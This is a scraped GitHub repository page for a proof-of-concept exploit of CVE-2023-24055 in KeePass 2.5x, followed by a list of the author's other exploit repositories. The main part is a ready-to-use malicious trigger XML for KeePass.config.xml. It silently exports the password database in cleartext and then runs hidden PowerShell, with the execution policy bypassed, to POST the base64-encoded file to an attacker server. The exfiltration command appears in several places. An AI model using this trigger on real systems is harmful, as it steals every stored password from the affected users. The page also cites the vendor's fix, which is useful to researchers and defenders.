alt3kx/CVE-2023-24055_PoC alt3kx/CVE-2023-24055_PoC

  • Stars
    star
    247
  • Rank 160,633 (Top 4 %)
  • Language
  • License
    GNU General Publi...
  • Created over 1 year ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
alt3kx/CVE-2023-24055_PoC
github

alt3kx

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2023-24055 PoC (KeePass 2.5x)

CVE-2023-24055 PoC (KeePass 2.5x)

Under discussion and analysis...

https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/

An attacker who has write access to the KeePass configuration file can modify it and inject malicious triggers, e.g to obtain the cleartext passwords by adding an export trigger.

https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://www.cve.org/CVERecord?id=CVE-2023-24055

My early PoC (KeePass 2.5x)

(1) An attacker who has write access to the KeePass configuration file KeePass.config.xml could inject the following trigger, e.g:

<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>
</TriggerCollection>

(2) Victim will open the keePass as normally activity , saving changes, etc...., the trigger will executed on background exfiltrating the credentials to attacker server

Trigger PoC details

a) The trigger will export the keepass database in KeePass XML (2.x) format included all the credentials (cleartext) into folowing path, e.g:

c:\Users\John\AppData\Local\Temp\exploit.xml

b) Once exported the file , a second action could be defined to exfiltrate the XML data using Powershell.exe and encoded to base64 e.g:

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) Data will exfiltrate to attacker web server e.g:

1

Trigger PoC values

Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Format:  KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden

Credentials...

PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

2

3

Trigger public examples:

https://keepass.info/help/kb/trigger_examples.html

Fix Released : Changes from 2.53 to 2.53.1:

https://keepass.info/news/n230109_2.53.html

Removed the 'Export - No Key Repeat' application policy flag; KeePass now always asks for the current master key when trying to export data.

Further readings

(*) What this KeePass CVE means for organizations searching for new password vaults (Carlos Perez)

https://www.trustedsec.com/blog/what-this-keepass-cve-means-for-organizations-searching-for-new-password-vaults/
https://www.youtube.com/watch?v=OEaFaSjaZY4

(*) KeePass disputes report of flaw that could exfiltrate a database (Steve Zurier)

https://www.scmagazine.com/analysis/identity-and-access/keepass-disputes-report-of-flaw-that-could-exfiltrate-a-database

(*) Security Weekly News (06:56 KeePass)

https://www.youtube.com/watch?v=iz0PsYlH8Ig

(*) KeePass 2.53.1, une nouvelle version qui corrige « la vulnérabilité » CVE-2023-24055 (IT Connect FR)

https://www.it-connect.fr/keepass-2-53-1-une-nouvelle-version-qui-corrige-la-vulnerabilite/
https://www.it-connect.fr/faille-critique-dans-keepass-un-attaquant-peut-exporter-les-mots-de-passe-en-clair/

(*) Tools

https://github.com/deetl/CVE-2023-24055
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Orange-Cyberdefense/KeePwn

Author

Alex Hernandez aka (@_alt3kx_)

More Repositories

1

CVE-2021-21985_PoC

Lua
210
star
2

CVE-2022-22965

Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
Lua
102
star
3

wafaray

Enhance your malware detection with WAF + YARA (WAFARAY)
Shell
97
star
4

CVE-2022-1388_PoC

F5 BIG-IP RCE exploitation (CVE-2022-1388)
87
star
5

CVE-2021-21972

Lua
55
star
6

CVE-2021-26084_PoC

54
star
7

CVE-2021-26855_PoC

Python
53
star
8

wafparan01d3

Quick WAF "paranoid" Doctor Evaluation | WAFPARAN01D3 Tool
Python
23
star
9

CVE-2022-22965_PoC

Spring Framework RCE (Quick pentest notes)
16
star
10

alt3kx.github.io

HTML
11
star
11

CVE-2018-12463

XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 (0day CVE-2018-12463)
6
star
12

airdecloak-ng

My Aircrack-ng contribution with Thomas d'Otreppe
C
4
star
13

CVE-2019-10685

A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
3
star
14

papers

A handy collection of my public papers, all in one place.
2
star
15

CVE-2018-7691

The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10
2
star
16

CVE-2018-7690

The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10
2
star
17

CVE-2018-10715

CVE-2018-10715
1
star
18

CVE-2007-6638

March Networks DVR 3204 - Logfile Information Disclosure
1
star
19

CVE-2001-0932

Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities
1
star
20

CVE-2020-13457

CVE-2020-13457
1
star
21

CVE-2004-2549

Nortel Wireless LAN Access Point 2200 Series - Denial of Service
1
star
22

CVE-2009-4118

Cisco VPN Client - Integer Overflow Denial of Service
1
star
23

CVE-2018-10467

CVE-2018-10467
1
star
24

CVE-2002-0448

Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities
1
star
25

CVE-2002-0289

Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow
1
star
26

CVE-2018-12596

Ektron Content Management System (CMS) 9.20 SP2, remote re-enabling users (CVE-2018–12596)
1
star
27

CVE-2001-0933

Cooolsoft PowerFTP Server 2.03 allows remote attackers to list the contents of arbitrary drives via a ls (LIST) command that includes the drive letter as an argument, e.g. "ls C:".
1
star
28

CVE-2001-0934

Cooolsoft PowerFTP Server 2.03 allows remote attackers to obtain the physical path of the server root via the pwd command, which lists the full pathname.
1
star
29

CVE-2007-5036

Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)
1
star
30

CVE-2002-0200

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name.
1
star
31

CVE-2001-1442

ISC INN 2.x - Command-Line Buffer Overflow
C
1
star
32

CVE-2018-12598

CVE-2018-12598
1
star
33

CVE-2018-12597

CVE-2018-12597
1
star
34

CVE-2018-10732

Dataiku REST-API by default the software, allows anonymous access to functionality that allows an attacker to know valid users.
1
star
35

CVE-2002-0201

Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow.
Perl
1
star
36

CTF_writeups

CTF writeups
1
star